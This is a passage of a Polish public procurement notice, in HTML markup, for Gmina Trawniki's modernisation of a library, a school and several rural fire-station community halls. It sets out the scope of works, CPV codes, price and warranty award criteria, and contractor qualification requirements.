class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Modernizacja, w tym poprawa efektywności energetycznej budynków publicznych stanowiących własność Gminy Trawniki (biblioteka, szkoła, świetlice)<br/>Do zakresu zadania należy:<br/>1. Przebudowa wraz z rozbudową istniejącego budynku biblioteki wraz z zagospodarowaniem terenu w miejscowości Struża Kolonia.<br/>Zakres obejmuje przebudowę i rozbudowę istniejącego budynku biblioteki (o nowe pomieszczenia w postaci sali wielofunkcyjnej z magazynkiem, zapleczem socjalnym, toaletą dla osób niepełnosprawnych oraz pomieszczenie porządkowe) wraz z przebudową kanalizacji sanitarnej, budową bezodpływowych zbiorników na ścieki, przebudową infrastruktury teletechnicznej oraz utwardzenia trenu – zgodnie z dokumentacją projektową i pozwoleniem na budowę.<br/>Zakres prac obejmować będzie w szczególności:<br/>- branżę budowlaną (roboty rozbiórkowe, roboty w zakresie przygotowania terenu pod budowę i roboty ziemne; fundamenty; podłoże posadzki parteru; ściany parteru, dach; stolarka i ślusarka; elewacja; tynki i okładziny wewnętrzne; posadzki; utwardzenie terenu; chodniki, pochylnia i schody zewnętrzne; drogi i parking; ogrodzenie; biały montaż i wyposażenie),<br/>- branżę sanitarną (technologia pompy ciepła; instalacja centralnego ogrzewania; instalacja wodociągowa; instalacja kanalizacji sanitarnej; instalacja klimatyzacji freonowej; instalacja wentylacji; zewnętrzna instalacja kanalizacji sanitarnej),<br/>- branżę elektryczną (zasilanie; zalicznikowe linie kablowe; oświetlenie terenu; tablice elektryczne; część istniejąca – modernizacja instalacji oświetleniowej; instalacja oświetleniowa; instalacja gniazd i siły; instalacja połączeń wyrównawczych i odgromowa; prace dodatkowe; instalacja fotowoltaiczna).<br/>2. Wymiana stolarki okiennej w budynku Szkoły Podstawowej w Oleśnikach<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę stolarki okiennej (na okna PCV),<br/>- wymianę stolarki drzwiowej zewnętrznej (na aluminiową), <br/>w budynku Szkoły Podstawowej w Oleśnikach – zgodnie z dokumentacją projektową.<br/>3. Modernizacja remizo – świetlicy w m. Siostrzytów.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę stolarki okiennej i parapetów wewnętrznych,<br/>- wymianę stolarki drzwiowej,<br/>- naprawę konstrukcji dachu poprzez dodanie nowych krokwi do istniejących,<br/>- wymianę części łat pod pokrycie,<br/>- wymianę pokrycia dachów, części obróbek blacharskich, dostosowania rynien i rur spustowych,<br/>- instalację nowego napisu podświetlanego „OSP SIOSTRZYTÓW”,<br/>- wykonanie instalacji fotowoltaicznej na dachu budynku remizo – świetlicy o minimalnej łącznej mocy 18,7 kW, ale nie większej niż 22 kW., <br/>- wykonanie instalacji klimatyzacji (2 jednostki zewnętrzne, 3 jednostki wewnętrzne),<br/>- wykonanie instalacji powietrznej pompy ciepła o mocy 16 KW na potrzeby CO i CWU.<br/>Do Wykonawcy należy również demontaż istniejącego kotła c.o. wraz z jego wyniesieniem i złożeniem w miejsce wskazane przez Zamawiającego oraz wykonanie niezbędnych napraw w miejscach po usuniętej starej instalacji (szpachlowanie oraz malowanie farbą w kolorze ściany).<br/>Prace należy wykonać zgodnie z dokumentacją projektową.<br/>4. Modernizacja budynku remizo – świetlicy w m. Biskupice.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę rynien i rur spustowych wraz z montażem nowych mocowań, pasów podrynnowych i nadrynnowych,<br/>- wymianę obróbek blacharskich,<br/>- ocieplenie ścian budynku łącznie ze ścianami fundamentowymi,<br/>- wymianę sufitu podwieszanego wraz z dociepleniem i nowym oświetleniem,<br/>- wyrównanie ściany północnej świetlicy,<br/>- malowanie pomieszczeń i boksu garażowego,<br/>- wykonanie wylewki poziomującej w boksie garażowym wraz z wykonaniem posadzki żywicznej,<br/>- wymianę stolarki okiennej, parapetów wewnętrznych i zewnętrznych wraz z narożnikami i pełną obróbką glifów,<br/>- wymianę drzwi zewnętrznych,<br/>- wymianę bramy garażowej na segmentową z napędem i drzwiami wejściowymi,<br/>- wykonanie opaski wokół budynku oraz wykonanie nawierzchni przed wjazdem do garażu,<br/>- instalację nowego napisu podświetlanego „OSP BISKUPICE”,<br/>- wykonanie instalacji elektrycznych.<br/>Prace należy wykonać zgodnie z dokumentacją projektową.<br/>5. Modernizacja remizo – świetlicy w m. Oleśniki.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę poszycia dachu na starej części budynku, części obróbek blacharskich,<br/>- wymianę i dostosowanie rynien i rur spustowych,<br/>- ocieplenie ścian budynku łącznie ze ścianami fundamentowymi,<br/>- ocieplenie stropów i stropodachu,<br/>- wymianę stolarki okiennej i parapetów wewnętrznych i zewnętrznych wraz z narożnikami i pełną obróbką glifów,<br/>- wymianę stolarki drzwiowej,<br/>- wykonanie opaski wokół budynku oraz wykonanie nawierzchni przed wjazdem do garażu,<br/>- wykonanie instalacji fotowoltaicznej o łącznej minimalnej mocy 15,4 kWp typu on-grid zlokalizowanej na dachu remizo – świetlicy,<br/>- instalację nowego napisu podświetlanego „OSP KSRG OLEŚNIKI”.<br/>Prace należy wykonać zgodnie z dokumentacją projektową.<br/>6. Modernizacja remizo – świetlicy w m. Dorohucza.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę poszycia dachu, orynnowania i obróbek blacharskich,<br/>- ocieplenie i izolacja stropów,<br/>- ocieplenie ścian budynku łącznie ze ścianami fundamentowymi.<br/>- demontaż boazerii, wykonanie niezbędnej naprawy wraz z malowaniem i wymianą instalacji elektrycznej.<br/>- demontaż podłogi drewnianej, wymiana na terakotę i ocieplenie.<br/>- wymianę stolarki okiennej, parapetów wewnętrznych i zewnętrznych wraz z narożnikami i pełną obróbką glifów. <br/>- wymianę stolarki drzwiowej.<br/>- wykonanie opaski wokół budynku oraz wykonanie nawierzchni przed wjazdem do garażu.<br/>- wymianę ogrodzenia na panelowe z bramą wjazdową przesuwną i furtką.<br/>- instalację nowego napisu podświetlanego „OSP DOROHUCZA”.<br/>- wykonanie instalacji fotowoltaicznej na dachu budynku remizo – świetlicy o minimalnej łącznej mocy 10,45 kW, ale nieprzekraczającej mocy przyłączeniowej obiektu, która wynosi 11 kW,<br/>- wykonanie instalacji klimatyzacji (1 jednostka zewnętrzna, 1 jednostka wewnętrzna),<br/>- wykonanie instalacji powietrznej pompy ciepła o mocy 12 KW na potrzeby CO i CWU.<br/>Do Wykonawcy należy również demontaż istniejącego kotła c.o. wraz z jego wyniesieniem i złożeniem w miejsce wskazane przez Zamawiającego oraz wykonanie niezbędnych napraw w miejscach po usuniętej starej instalacji (szpachlowanie oraz malowanie farbą w kolorze ściany).<br/>Prace należy wykonać zgodnie z dokumentacją projektową. <br/>7. Modernizacja remizo – świetlicy w m. Pełczyn.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymiana poszycia dachowego bez zmiany ukształtowania konstrukcji dachu,<br/>- wymiana orynnowania,<br/>- izolacja fundamentów przeciw wilgociowa oraz termiczna , <br/>- montaż paneli fotowoltaicznych na dachu o łącznej mocy 9,88 kWp, <br/>- montaż pompy ciepła powietrze- woda wraz z osprzętem,<br/>- montaż zbiornika CWU zasilanego z pompy ciepła – dystrybucja przez istniejącą instalację wodną, <br/>- wykonanie ocieplenia ścian i podmurówki, <br/>- wykonanie opaski z odpływami wody z rynien,<br/>- wykonanie nowego orynnowania,<br/>- wymiana stolarki okiennej i drzwiowej,<br/>- ocieplenie stropu, <br/>- ułożenie kostki przed wjazdem do garażu i wejściem do budynku,<br/>- modernizacja instalacji elektrycznej,<br/>- modernizacja podłogi, w części obiektu<br/>- wykonanie tynków wewnętrznych suchych w części obiektu<br/>- wykonanie sufitu systemowego wraz z instalacją opraw oświetleniowych w części obiektu, <br/>- wykonanie klimatyzacji (1 jednostka zewnętrzna, 2 jednostki wewnętrzne),<br/>- wykonanie napisu podświetlanego „OSP PEŁCZYN”.<br/>Do Wykonawcy należy również demontaż istniejącego kotła c.o. wraz z jego wyniesieniem i złożeniem w miejsce wskazane przez Zamawiającego oraz wykonanie niezbędnych napraw w miejscach po usuniętej starej instalacji (szpachlowanie oraz malowanie farbą w kolorze ściany).<br/>Prace należy wykonać zgodnie z dokumentacją projektową. <br/>8. Modernizacja remizo – świetlicy w m. Struża.<br/>Zakres prac obejmować będzie w szczególności:<br/>- wymianę poszycia dachowego bez zmiany ukształtowania konstrukcji dachu,<br/>- wymianę orynnowania,<br/>- izolację fundamentów,<br/>- montaż paneli fotowoltaicznych o mocy do 50 kW,<br/>- montaż pompy ciepła (powietrze woda) o mocy do 50 kW, <br/>- rozprowadzenie instalacji niskotemperaturowej po budynku (grzejniki),<br/>- montaż zbiornika CWU zasilanego z pompy ciepła i wykonanie instalacji cwu,<br/>- wykonanie termomodernizacji ścian i podmurówki,<br/>- remont schodów (2 szt.) oraz rampy dla niepełnosprawnych (1 szt.), <br/>- remont opaski wraz z odpływami wody z rynien,<br/>- wymianę stolarki okiennej i drzwiowej (o tych samych wymiarach/bez zmiany wielkości otworów),<br/>- ocieplenie stropu,<br/>- remont placu przed budynkiem – ułożenie kostki przed wjazdem do garażu i wejściem do budynku,<br/>- wymianę instalacji elektrycznej,<br/>- wykonanie napisu podświetlanego na budynku „OSP STRUŻA”,<br/>- modernizację podłogi w części świetlicowej (tam gdzie nie ma płytek),<br/>- wykonanie tynków wewnętrznych suchych (regipsy),<br/>- wykonanie sufitu systemowego wraz z instalacją opraw oświetleniowych wpuszczanych, <br/>- montaż klimatyzatorów,<br/>- wydzielenie pomieszczeń w budynku – kuchnia, łazienka dla niepełnosprawnych i pomieszczenie gospodarcze bez zmiany elementów konstrukcyjnych oraz wykonanie niezbędnych przyłączy.<br/>Do Wykonawcy należy również demontaż istniejącego kotła c.o. wraz z jego wyniesieniem i złożeniem w miejsce wskazane przez Zamawiającego oraz wykonanie niezbędnych napraw w miejscach po usuniętej starej instalacji (szpachlowanie oraz malowanie farbą w kolorze ściany).<br/>Prace należy wykonać zgodnie z dokumentacją projektową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">32421000-0 - Okablowanie sieciowe</p> <p class="mb-0">32562000-0 - Kable światłowodowe</p> <p class="mb-0">32423000-4 - Gniazda sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">32424000-1 - Infrastruktura sieciowa</p> <p class="mb-0">09331100-9 - Kolektory słoneczne do produkcji ciepła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zarówno w zakresie Części I, jak i II zamówienia, Zamawiający będzie się kierował następującymi kryteriami:<br/>Kryteria oceny ofert:<br/>a) Cena (C) – 60%<br/>b) Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane (PG) – 40%<br/>1.1. Ocena ofert dokonywana będzie według następujących wzorów:<br/>a) Kryterium cena - C - cena waga 60% (60 pkt maksymalnie)<br/>Ilość punktów przyznanych danej ofercie wylicza się na podstawie wzoru:<br/> (Cn) - najniższa cena brutto<br/>C = –―–―–―–―–―–―–―–―–―– x 60<br/> (Co) - cena oferty badanej brutto<br/>b) Kryterium Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane PG – okres gwarancji waga 40% (40 pkt maksymalnie)<br/>Punkty w kryterium „Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane” przyznawane będą zgodnie z poniższą zasadą:<br/>Minimalny okres gwarancji jaką Wykonawca może zaoferować wynosi 36 miesięcy. W przypadku zaoferowania minimalnego okresu gwarancji tj. 36 miesięcy oferta Wykonawcy otrzyma 0,00 pkt (zero punktów). W przypadku zaoferowania gwarancji poniżej minimalnego okresu (tj. mniej niż 36 miesięcy) oferta zostanie odrzucona. Jeżeli Wykonawca w ofercie w ogóle nie wskaże okresu gwarancji, Zamawiający przyjmie, ze Wykonawca nie oferuje gwarancji. W takim przypadku oferta również zostanie odrzucona.<br/>W przypadku, gdy Wykonawca zaoferuje okres gwarancji wynoszący 60 miesięcy, oferta otrzyma 40,00 pkt (maksymalna ilość punktów w tym kryterium). Wykonawca może zaoferować okres gwarancji dłuższy niż wyznaczony maksymalny 60 miesięcy, jednak w takim przypadku Zamawiający przyjmie do obliczeń wartość 60 miesięcy, za co oferta Wykonawcy otrzyma 40,00 pkt.<br/>c) Punkty uzyskane łącznie w kryterium cena i gwarancja stanowić będą ocenę danej oferty. <br/>S (suma)= C (cena) + PG (Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane)<br/>S - suma punktów uzyskanych w kryterium cena i okres gwarancji<br/>C – liczba punktów uzyskanych w kryterium cena<br/>PG – liczba punktów uzyskanych w kryterium okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane<br/>1.2. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów przyznaną wg wzoru wskazanego w pkt 6.1.1. lit. c).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu w zakresie:<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>1.2.uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>1.3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>1.4. zdolności technicznej lub zawodowej:<br/>1.4.1. DLA CZĘŚĆ I ZAMÓWIENIA <br/>1.4.1.1 Wykonawca spełni warunek, jeśli wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, wykonał należycie (w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończył) jedną (1) robotę budowlaną obejmującą swym zakresem budowę lub przebudowę budynku użyteczności publicznej wartości nie mniejszej niż 1.500.000,00 zł brutto (słownie: jeden milion pięćset tysięcy złotych 00/100).<br/>Przez wartość 1 roboty budowlanej Zamawiający rozumie roboty budowlane w ramach 1 umowy (1 zadania inwestycyjnego). W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>UWAGA! Zamawiający nie dopuszcza sumowania wartości robót w ramach różnych umów, zamówień i kontraktów.<br/>UWAGA! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) lub w przypadku powoływania się przez Wykonawcę na zasoby podmiotu trzeciego, warunek musi być spełniony w całości przez odpowiednio wykonawcę, wykonawcę wspólnie ubiegającego się o udzielenie zamówienia lub przez podmiot trzeci udostępniający zasoby (Zamawiający nie dopuszcza sumowania potencjału w zakresie doświadczenia).<br/>1.4.1.2. Wykonawca spełni warunek, jeśli wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w specjalnościach: <br/>a)	konstrukcyjno-budowlanej lub inżynieryjnej do kierowania robotami budowlanymi bez ograniczeń wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub inne uprawnienia uprawniające do kierowania robotami budowlanymi nadane na podstawie przepisów obowiązujących w czasie wydania uprawnień – osoba pełniąca funkcję Kierownika budowy;<br/>b)	instalacyjnej w zakresie sieci, instalacji i urządzeń: gazowych, cieplnych, wentylacji mechanicznej, klimatyzacji, wodno- kanalizacyjnych i c.o., - osoba pełniąca funkcję Kierownika robót sanitarnych;<br/>c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – osoba pełniąca funkcję Kierownika robót elektrycznych, <br/>lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551 z późn. zm.), lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r.-Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). <br/>UWAGA! W przypadku składania ofert przez Wykonawców wspólnie ubiegających się o zamówienie, warunek w zakresie kadry (personelu) może być spełniony przez jednego Wykonawcę bądź kumulatywnie (łącznie) przez kilku bądź wszystkich Wykonawców.<br/>UWAGA! Zamawiający nie dopuszcza sytuacji, w której Wykonawca będzie dysponował jedną osobą posiadającą uprawnienia budowlane do kierowania robotami jednocześnie w kilku ww. specjalnościach.<br/>UWAGA! Jeżeli Wykonawca zamierza złożyć więcej niż jedną ofertę (na dwie części zamówienia) to może, w celu wykazania zdolności technicznych i zawodowych wskazać to samo zadanie i tą samą osobę na większą liczbę części zamówienia, jeżeli potwierdzają one spełnianie warunków na wszystkie części w ramach, których zostaną wykazane.<br/>1.4.2 CZĘŚĆ II ZAMÓWIENIA:<br/>1.4.2.1.Wykonawca spełni warunek, jeśli wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, wykonał należycie (w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończył) dwie (2) roboty budowlane obejmujące swym zakresem budowę lub przebudowę lub modernizację budynku użyteczności publicznej wartości nie mniejszej niż 1.000.000,00 zł brutto (słownie: milion złotych 00/100) każda z tych robót.<br/>Przez wartość 1 roboty budowlanej Zamawiający rozumie roboty budowlane w ramach 1 umowy (1 zadania inwestycyjnego). W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>UWAGA! Zamawiający nie dopuszcza sumowania wartości robót w ramach różnych umów, zamówień i kontraktów.<br/>UWAGA! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) lub w przypadku powoływania się przez Wykonawcę na zasoby podmiotu trzeciego, warunek musi być spełniony w całości przez odpowiednio wykonawcę, wykonawcę wspólnie ubiegającego się o udzielenie zamówienia lub przez podmiot trzeci udostępniający zasoby (Zamawiający nie dopuszcza sumowania potencjału w zakresie doświadczenia).<br/>1.4.2.2. Wykonawca spełni warunek, jeśli wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w specjalnościach: <br/>a)	konstrukcyjno-budowlanej lub inżynieryjnej do kierowania robotami budowlanymi bez ograniczeń wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub inne uprawnienia uprawniające do kierowania robotami budowlanymi nadane na podstawie przepisów obowiązujących w czasie wydania uprawnień – osoba pełniąca funkcję Kierownika budowy;<br/>b)	instalacyjnej w zakresie sieci, instalacji i urządzeń: gazowych, cieplnych, wentylacji mechanicznej, klimatyzacji, wodno- kanalizacyjnych i c.o., - osoba pełniąca funkcję Kierownika robót sanitarnych;<br/>c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – osoba pełniąca funkcję Kierownika robót elektrycznych, lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551 z późn. zm.), lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r.-Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). <br/>UWAGA! W przypadku składania ofert przez Wykonawców wspólnie ubiegających się o zamówienie, warunek w zakresie kadry (personelu) może być spełniony przez jednego Wykonawcę bądź kumulatywnie (łącznie) przez kilku bądź wszystkich Wykonawców.<br/>UWAGA! Zamawiający nie dopuszcza sytuacji, w której Wykonawca będzie dysponował jedną osobą posiadającą uprawnienia budowlane do kierowania robotami jednocześnie w kilku ww. specjalnościach.<br/>UWAGA! Jeżeli Wykonawca zamierza złożyć więcej niż jedną ofertę (na dwie części zamówienia) to może, w celu wykazania zdolności technicznych i zawodowych wskazać to samo zadanie i tą samą osobę na większą liczbę części zamówienia, jeżeli potwierdzają one spełnianie warunków na wszystkie części w ramach, których zostaną wykazane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: <br/>Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>W ZAKRESIE CZ. I ZAMÓWIENIA<br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem nr 8a do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem 8b do SWZ.<br/>W ZAKRESIE CZ. II ZAMÓWIENIA<br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem nr 8a do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem 8b do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2023 r., poz. 1497 z późn. zm.). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza 